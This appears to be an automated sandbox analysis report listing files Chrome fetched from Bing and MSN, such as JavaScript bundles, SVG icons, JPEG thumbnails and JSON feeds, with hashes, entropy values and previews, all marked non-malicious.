                                                                                                                                                                                                                                                                        SHA-512:A6AE760AFBA686AF0D5D5D9F95C514E7A5F79FE3B52A466C0ED38D7AEFD0F3B6C0B8E997CB60FEB8E95D741F53E5B6936BA97A011D1259529E9E833657A757E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/shopping-sd-card.17fd04a1ee6981eb2597.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["shopping-sd-card"],{52468:function(e,t,i){i.d(t,{a:function(){return g}});var n=i(33940),o=i(75155),r=i(99452),a=i(83227),s=i(38156),l=i(65135),d=i(60483),c=i(3900),p=i(987),u=i(98304);class g extends o.l{constructor(){super(...arguments),this.clickBannerWithin7days=!1,this.showBannerTwiceWithin7days=!1,this.sdCardMaskVisible=!0,this.showInitialBanner=!1,this.showContextualFeedback=!1,this.showThankBanner=!1,this.loadFeedbackLinkWCE=!1}experienceConnected(){this.telemetryObject=new d.D({name:"SdCardMask"+this.cardType,action:s.Aw.Click,behavior:s.wu.View,content:{headline:this.cardType}}),this.sdCardMaskVisible=!g.visited.has(this.cardType),this.generateTelemetryTags(),this.isProng2Widget="prong2"===this.config.scenarioType;const e=this.isFullCard?"widget fullWidget ":"widget ";this.sdMaskContextContainerClassName=this.isProng2Widget?"sd-mask-context-container "+e:"sd-mask
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):31512
                                                                                                                                                                                                                                                                        Entropy (8bit):5.678691607929192
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:rUqw5Xmdfg58CMsk66xBo5EUWC5MJ4YkztsVUOJEvU04sDYwe/BfTRkJ5rr9:rUFkd4uxS6UWC5MJ4Ykzts+WUNfU5pS
                                                                                                                                                                                                                                                                        MD5:C121E7C50C80D5E9DBC063BA33257106
                                                                                                                                                                                                                                                                        SHA1:A1B261FC6391ED984C3AE7DC33AF453F0C3F8FD5
                                                                                                                                                                                                                                                                        SHA-256:D2150001B521D505BA50AD5912BB56413B2AB7462452CE4056498F3067B5262E
                                                                                                                                                                                                                                                                        SHA-512:4ABC5D7E3AF0BA51AA1E6DB3334FECC1186778A84AE87A86A5B3D8EE0DEBDBE962248D319EB14423449653761F69691C226B5535C07110ED69244CBA6AAC6688
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:{"Scripts":[{"Path":"https://r.bing.com/rp/pF2PfMNHZl6kUOVLn4XEGHZP_z0.js","Postloaded":true},{"Path":"https://r.bing.com/rp/yfhemBfy2-1hsn-Pzs7ZcFHIdVM.js","Postloaded":true}],"Styles":[{"Path":"https://r.bing.com/rp/qz_XABEk9uinJqFMD6b6yPjYYTU.css","Postloaded":false},{"Path":"https://r.bing.com/rp/RwGC9aq3HWFHA4-nvqf37VWlckM.css","Postloaded":false},{"Path":"https://r.bing.com/rp/6wDd80TfrjsxqxnEl7ODpSWRxdY.css","Postloaded":true},{"Path":"https://r.bing.com/rp/d_DmhogwQOWjbEX-g0oLpQVcA5w.css","Postloaded":true}],"CustomFields":{"VideoYuleLog":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2019/YuleLog/1080/Fireplace_GettyRR_98571085_1080.mp4","VideoAurora":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2019/Aurora/1080/1920_FinlandAurora_SS_13482083.mp4","AudioYuleLogMp3":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2019/YuleLog/audio/CozyFirepace_Getty_553682.mp3","ImageToShare":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2020/h
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):885
                                                                                                                                                                                                                                                                        Entropy (8bit):4.5570985620533735
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:ty6MIrYQ2f6pmdyG5CRaWqFQZtKSlt85upWEtKMca/Kv3kK3kK3TfQARQ:ttMIYQpmgG5C4zFQZcSXWEcoqRQ
                                                                                                                                                                                                                                                                        MD5:3EE38F567EE1E65F61C47CCA63D4EF8B
                                                                                                                                                                                                                                                                        SHA1:28A9AFEE39ACEB67BF89CF30CA9831E54286200F
                                                                                                                                                                                                                                                                        SHA-256:21227BFE773210614F70787C9BD2C6AC5A301791205A69E67E3AA65162D94929
                                                                                                                                                                                                                                                                        SHA-512:52E593E07BE82ADFA9599EB4DFBFFA322CEC58CDA4A17BCA0BCA1A6A4E6ECB2A459B41B1B1103D022376F51FACA819BA442B55B8BF6286CF6152FA3CB9F62FA6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/KKmv7jms62e_ic8wypgx5UKGIA8.svg
                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 64 48" viewBox="0 0 64 48" xmlns="http://www.w3.org/2000/svg"><path d="m4.5.5h55c2.209 0 4 1.791 4 4v39c0 2.209-1.791 4-4 4h-55c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="#fff" stroke="#ccc"/><path d="m14 14h-6c-1.105 0-2-.895-2-2v-4c0-1.105.895-2 2-2h6c1.105 0 2 .895 2 2v4c0 1.105-.895 2-2 2z" fill="#106ebe"/><path d="m34 36h-26c-1.105 0-2-.895-2-2v-14c0-1.105.895-2 2-2h26c1.105 0 2 .895 2 2v14c0 1.105-.895 2-2 2z" fill="#c4c4c4"/><path d="m24 14h29c2.209 0 4-1.791 4-4s-1.791-4-4-4h-29c-2.209 0-4 1.791-4 4s1.791 4 4 4zm31 4h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-47c-1.105 0-2 .895-2 2s.895 2 2 2h47c1.105 0 2-.895 2-2s-.895-2-2-2z" fill="#ddd"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28499), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):28499
                                                                                                                                                                                                                                                                        Entropy (8bit):5.464092044647653
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:kpe5mB7azmB7ad5KVyDQNSkGyDQS2mZvghM/4S8Sv:kVaAazDxgDj/Zvb7nv
                                                                                                                                                                                                                                                                        MD5:435D4389CF37EBDF488B09D33328E64C
                                                                                                                                                                                                                                                                        SHA1:E4897917BB729F94808672478A32FAD44CEEB350
                                                                                                                                                                                                                                                                        SHA-256:F56C5B27AD30B13345DEDB5081AC381A0BE37A454242D2D289B90C5F44CDDDA8
                                                                                                                                                                                                                                                                        SHA-512:E0C35C5055200CD536B190966872EBEB8D7ED9ECE087E49F51B0EF6F9D7A935DC938C53C9C562E42506A10DDDE08C6B8D7B0A1EFB10BCD972FE5EF124DCCA88A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/5Il5F7tyn5SAhnJHijL61Ezus1A.js
                                                                                                                                                                                                                                                                        Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redotIMG.png",w=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible}}return n.prototype.initialize=function(){var r=this,e,o,s,w,n;if(this.reportActivityModel){if(this.sendR
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 268x224, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5901
                                                                                                                                                                                                                                                                        Entropy (8bit):7.902009675697229
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:NPbbbrHlYM80XPq3s+cbODSZRyOvMUi0oV2OmhaRgPSgjAQlAe6jEFd9ThYO2lXL:NPbbbBC0XPq32RvyOvYwhpVjAQRbDHYZ
                                                                                                                                                                                                                                                                        MD5:724ED6D9C7E08D475DE2A4D13BF765C3
                                                                                                                                                                                                                                                                        SHA1:34463B15C954D0B452864090C39869514B6F09A8
                                                                                                                                                                                                                                                                        SHA-256:D15868649ED820AB797A3F0E85BAEAE6ED3174D3A3DC8FAAC9B57A8A5474E513
                                                                                                                                                                                                                                                                        SHA-512:C92E491DD2B4577D2A2859F6831243C66200172395E1089AF039D3E96345DE65ADC44C90386221ADEC9C0F82F77782CD1C0936E34B05D5C5AD96130F9DFA977D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=OPHS.3WjN03GeiIKf9g474C474&o=5&pid=21.1&c=4&h=224&w=268&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.............C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...........".......................................R..........................!1Qq.2Aa..."....Rbr...#%BS...$345ce.......t&6ETUdsu........................................................1.!A.BQ............?....'i.{J....(z..T*.....w..T".....w..T".....w..T".....w..T"..}..tf.u,r.=I6.fw.Va..iW=..S..j.....r..Z85.#w.k."......|qW:..gC<sA3....to......5...z..T.5...)......^..'h....h5.l..z.'.......)...=.?......j.4UM.c....Q.6....v..~.`;.......u....S.0.7.^.K.K....n.}...k..Y.wl...\'.....m.+.rF0.F6g;.N.F...2UB.... ..h....=....,cs/...5...n.Zp2.f.} ...'.R.p.:c.U...A.MG...`.gnv{.?.l.....E=;%s.qa.9Xc.o,.....r..c..0c....'>.F.....g...]..=.]WN.g.Y...V.a._.k.m....D..'.L;.f....=c..l..u..8.[..7[.]........W.9w..S..|J.A9w..S..|J.A9w..S..|J.A9w..S..|J.A9w..U.'.<UJ.n<.....w2.I.;.P................y..Y(&......C.:.r2.......i.........y.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (55200)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):115516
                                                                                                                                                                                                                                                                        Entropy (8bit):5.4468973130101626
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:z+HTGujHDljSadkHycv1/+foqKXHawiC8SbbORqNrtzFSezhozdpRMH:z+HTGujsdHycv1/+foqKXHawiCJf5p
                                                                                                                                                                                                                                                                        MD5:8E0415A5B0BA09FFE1B20B1B7F919D96
                                                                                                                                                                                                                                                                        SHA1:A381D0E84452ABAE83A013E7A5BEEAA355783F17
                                                                                                                                                                                                                                                                        SHA-256:8925E900C60537469EF290991A41B40A7C44E760B5F32213437F8B13A09AB5DD
                                                                                                                                                                                                                                                                        SHA-512:C41DC40BDE448D39F01E270DCEA483BC81BF3C52A8A1544D93490E19F2870CECC23052174BC6568774BBA9191A1FD9B9B05A3D9ADAEADC81CB216CE55EB72A73
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/card-actions-wc.e49ce4b00559e7496194.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["card-actions-wc"],{545:function(e,t){"use strict";t.Z='<svg width="12" height="12" viewBox="0 0 12 12"><path d="M6.85 6 12 11.15l-.85.85L6 6.85.85 12 0 11.15 5.15 6 0 .85.85 0 6 5.15 11.15 0l.85.85L6.85 6Z"/></svg>'},19456:function(e,t){"use strict";t.Z='<svg width="14" height="15" viewBox="0 0 14 15"><path d="M11.77.75c.31 0 .6.06.87.18A2.2 2.2 0 0 1 14 2.98a2.2 2.2 0 0 1-.66 1.57L4.2 13.7 0 14.76l1.05-4.21 9.14-9.13a2.19 2.19 0 0 1 .73-.49c.27-.11.55-.17.85-.17Zm-9.75 9.88a2.78 2.78 0 0 1 1.32.78 2.76 2.76 0 0 1 .78 1.32l7.6-7.6-2.1-2.1-7.6 7.6Zm-.99 3.09 2.4-.6a2.09 2.09 0 0 0-.22-.64 2.04 2.04 0 0 0-.4-.54 2.04 2.04 0 0 0-.54-.4 2.09 2.09 0 0 0-.64-.23l-.6 2.4Zm11.22-9.13.37-.35a2.93 2.93 0 0 0 .32-.36c.1-.12.17-.26.22-.4a1.36 1.36 0 0 0 .09-.5 1.5 1.5 0 0 0-.9-1.36 1.4 1.4 0 0 0-.58-.12 1.36 1.36 0 0 0-.5.09 1.73 1.73 0 0 0-.4.22 3.06 3.06 0 0 0-.36.32l-.35.37 2.09 2.1Z"/></svg>'}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):27050
                                                                                                                                                                                                                                                                        Entropy (8bit):5.311910726386856
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:Ju5HpoedXBkzeBPaMZFbIf3NGvRgr32YPGeCxfRPPOqbgoMmb+KAYpHYs7+x:J6xtBkzeoM/biGg9GecwKgoMmNp4s7+x
                                                                                                                                                                                                                                                                        MD5:6766470B95D42D3B8AB4CF543FA49BD2
                                                                                                                                                                                                                                                                        SHA1:DC905CDF6875CD8BB69CA94385934E2683884DB5
                                                                                                                                                                                                                                                                        SHA-256:CDA368A18C96F2E11242E0463B1A5E55D91994E41DA38B41F9C82C0C20A55102
                                                                                                                                                                                                                                                                        SHA-512:9902C88A12CC9A9AB397AF420D56EEE82A9D3FBB75E38EA3D62FECF18D479B1FE23DA3975C0593FD0FB70367C6ED2778130BFDA6A2FE23530806502E27ECB391
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="45" height="14" viewBox="0 0 45 14" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.<rect width="45" height="14" fill="url(#pattern0)"/>.<defs>.<pattern id="pattern0" patternContentUnits="objectBoundingBox" width="1" height="1">.<use xlink:href="#image0_51_2339" transform="matrix(0.000879864 0 0 0.00282813 -0.2438 -0.774074)"/>.</pattern>.<image id="image0_51_2339" width="1704" height="901" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABqgAAAOFCAYAAAAWJGOCAAAACXBIWXMAAC4jAAAuIwF4pT92AAAgAElEQVR4nOzdTXIcR5Yu0HCZxl2oFRTUGyhoBQQn/YaE5s+MwApIroDkCkCuAJBZzwkNX08IroDQBprQCoTqDfizoG6qUyB+8ifcwyPyHDOa1GoyEfD0DLDuF/d6BwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5235
                                                                                                                                                                                                                                                                        Entropy (8bit):7.915838822311368
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEtzKiyw9ewk7gBzP3RovWzNb9tXf5oWR9cqkv/+:ygizKi/ewkMP3Cuz/9x9ae
                                                                                                                                                                                                                                                                        MD5:822F9E47D1941C96DE090670D5E49FF6
                                                                                                                                                                                                                                                                        SHA1:A9B3C7E3B73B208F74062E86ACA4747B47489608
                                                                                                                                                                                                                                                                        SHA-256:EDBC6B8400D9666772758F4254BA667CF671398C697F1954DE81CEB324B140B0
                                                                                                                                                                                                                                                                        SHA-512:DB1F05F74BCD99F39660BA9B077456F33720D3B6821F55A5ED0584EA416F5578389ED64AAB0DBEA7D33D22A5205C8F435104C1F28621D0FEAC740DF079710319
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..-.-..6..S..E;KCr....=iZ..q..|.y..5......2lI.e.t.U...,r}k.O..........:4....(9'.?...^hl......jORN.}..4}..L.Kte.....zS..;W?.{.^.9F..#.."C...F...3..F.2..(.G.&.u......v5hD,F".I*0=.....1...}ou...Ko.ls.I..5.}......."msJ../%......uX......ap.._[J.2.&R..S...u.w_._.m&.~.p..^....?.iC...........c.4/i%xD.a......;..uB.V.E..a...U&..F>....k....u..v..".......u.&...0G
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):24024
                                                                                                                                                                                                                                                                        Entropy (8bit):7.966844333163851
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eMdwk5XFqt9lvGnzxoSI2PtLSOdIOQFn//OKV8V+uK8YsuWLRyJ2:eMd151qtqzx3HkB/OKV8VL+BW0J2
                                                                                                                                                                                                                                                                        MD5:7F1C78F2CD6FB2C6328B4B08C4D59D0C
                                                                                                                                                                                                                                                                        SHA1:2E9129872556B279C09322419B556E21C93482CC
                                                                                                                                                                                                                                                                        SHA-256:CA4E4F8A09800325AFD2D53965371F283B0F66F8A2EF6D24AEF235B4BD70DDBD
                                                                                                                                                                                                                                                                        SHA-512:36197A3F6EBA8CE4ADA0A8A8D71338DAF732C89EA1EB90B8A180185309F861AEF82AACCC0A9DFDCEF27AC5DDFD460F5DBA03D1456E4051D5372AAE9C00FC0970
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....h...bQ......o.. ...8d..f.o*...W...H.........s_.....q.X.H.l(.j.....d|S........k*.*.....k.G...wFt.b.]...q...`...sG..Kh.....|W.....o..m..Eq..H#[...[.!]O#88<.(vkA..;3.;...YT.X.....I.P..][.{+.&&'i/......A..8...7.:..k&h.......c....k7.:.6,.U}....]A.v..>.`...............#.D....U.F..aSF..d...dn.vx=8=..G3..ix.;q.Oj.._..s.g.OL.S...a..H..`.x#.>\....\.@8..4..l....%?).q.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1833
                                                                                                                                                                                                                                                                        Entropy (8bit):4.991497829827264
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Yd+hU6sIEA1Uxk+kxqwHuKYSO+yhPhHX+gQr:Js3A1UYxq6dI5mr
                                                                                                                                                                                                                                                                        MD5:EC4B4AE6EA40A2118B87BC219736CECF
                                                                                                                                                                                                                                                                        SHA1:14EE529380E3ACF329A6D83CD07BC632654AEE4D
                                                                                                                                                                                                                                                                        SHA-256:603B74D01DA0132F1A20BFF3FFD463C696C1B1307B09BE01BE4364A6D4B2171E
                                                                                                                                                                                                                                                                        SHA-512:5A652624B163526ECE2B9884F5739D19828DA5714B16E35A61F087D13D6F95F35ACC7DFA6289BE113631967244F5EAFBCB40CD7B91CD1403294DC3A7A2D792C5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/hp/api/v1/codexnudge?format=json&
                                                                                                                                                                                                                                                                        Preview:{"title":"","data":[{"clickThroughUrl":"https://www.bing.com/search?iscopilotedu=1&sendquery=1&q=Write%20a%20C%23%20program%20to%20check%20if%20a%20number%20is%20prime","fullText":null,"imageUrl":null,"modifiedBy":null,"modifiedTimestamp":0,"prompt":"","promptIconUrl":null,"promptSubtitle":null,"query":"Write a C# program to check if a number is prime","response":null,"type":0,"category":null},{"clickThroughUrl":"https://www.bing.com/search?iscopilotedu=1&sendquery=1&q=Help%20me%20discover%20unique%20ideas%20for%20personalized%20gifts.%20What%20are%20some%20popular%20options%20for%20customizing%20a%20gift%3F","fullText":null,"imageUrl":null,"modifiedBy":null,"modifiedTimestamp":0,"prompt":"","promptIconUrl":null,"promptSubtitle":null,"query":"Help me discover unique ideas for personalized gifts. What are some popular options for customizing a gift?","response":null,"type":0,"category":null},{"clickThroughUrl":"https://www.bing.com/search?iscopilotedu=1&sendquery=1&q=Write%20a%20short%2
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14883
                                                                                                                                                                                                                                                                        Entropy (8bit):5.494942715728041
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:V6KOdXzdgwvd8DjXS23QaqgAl0kIslPaGySHiuoKcV2pCQLpbEzH:fOLcXSJaRkh9ixSdJca0
                                                                                                                                                                                                                                                                        MD5:71B6A2B92667FF06FB056FED2C16295E
                                                                                                                                                                                                                                                                        SHA1:16EDA1A695AEF2C59E9B0886F4F4C7446328071C
                                                                                                                                                                                                                                                                        SHA-256:FE9033A005DFADE7C0ADD239BBC02DA3F7128D3B4509AC993921D24DBE209D05
                                                                                                                                                                                                                                                                        SHA-512:572CBFE3F1ED46156D1AC00E2B2BF532B9F12CB71DB5125CD3C7D82D9B06A7F7B9D136881C6FBBB090552196B75C4BA9247B308D4F62C6F17DE69605DA1A68C8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:{"title":"","data":[{"typeName":"TrendingNow","items":[{"title":"6 dead, 3 injured in Texas","url":"/search?q=Shootings+across+Texas&efirst=0&ecount=50&filters=tnTID%3a%223C7AB6C8-CAEF-439f-B7E1-A920F1936B4E%22+tnVersion%3a%225397447%22+Segment%3a%22popularnow.carousel%22+tnCol%3a%220%22+tnOrder%3a%22af02067c-9620-49e2-b7c7-b728ad9ba5d0%22&form=HPNN01","imageUrl":"/th?id=OPN.RTNews_pu4Sh615T_Ss0HuDxz5lbg&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow","badge":null,"imageCredit":". Provided by New York Post","tooltip":"Shootings across Texas","linksTarget":"","dataTags":null,"additionalMetaData":{"editorial":{"clickThroughUrl":"","badgeText":"","badgeColor":"","badgeBackground":""},"msn":{"clickThroughUrl":"","articleId":"","source":""}},"shortTitle":"","longTitle":""},{"title":"Air Force confirms fatality","url":"/search?q=Osprey+crash+in+Japan&efirst=0&ecount=50&filters=tnTID%3a%2262A0725A-144A-40a3-B55B-EAC2E4C299F7%22+tnVersion%3a%225397447%22+Segment%3a%22popularnow.carousel%22+tnCol%3a%22
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):282
                                                                                                                                                                                                                                                                        Entropy (8bit):4.768675821769942
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                                                                                                                                                                                        MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                                                                                                                                                                                        SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                                                                                                                                                                                        SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                                                                                                                                                                                        SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (589), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):589
                                                                                                                                                                                                                                                                        Entropy (8bit):5.085028072286348
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:bCMUnSeFbDN5a8f8R4Xtmp4ElMYVoJFp1wErUVKtRJnZM4C8Lv:bPUSeFbZ5ae8R4XtmqElFVK1ptRNj
                                                                                                                                                                                                                                                                        MD5:7A903A859615D137E561051C006435C2
                                                                                                                                                                                                                                                                        SHA1:7C2CBEB8B0E83E80954B14360B4C6E425550BC54
                                                                                                                                                                                                                                                                        SHA-256:281D6234FD292800C2A5DBD14E524C9CEE0D4438188B0B7D873ABF41515A7666
                                                                                                                                                                                                                                                                        SHA-512:AA47EFAB7EC689B838D1E5ADFE26E035E8B93F2B806F1954214447CB2065FA5906F81A70B4C656B3CE1490D8AC2009C7E7B0F96491D6D4559C41FB25D08FE35C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/fCy-uLDoPoCVSxQ2C0xuQlVQvFQ.css
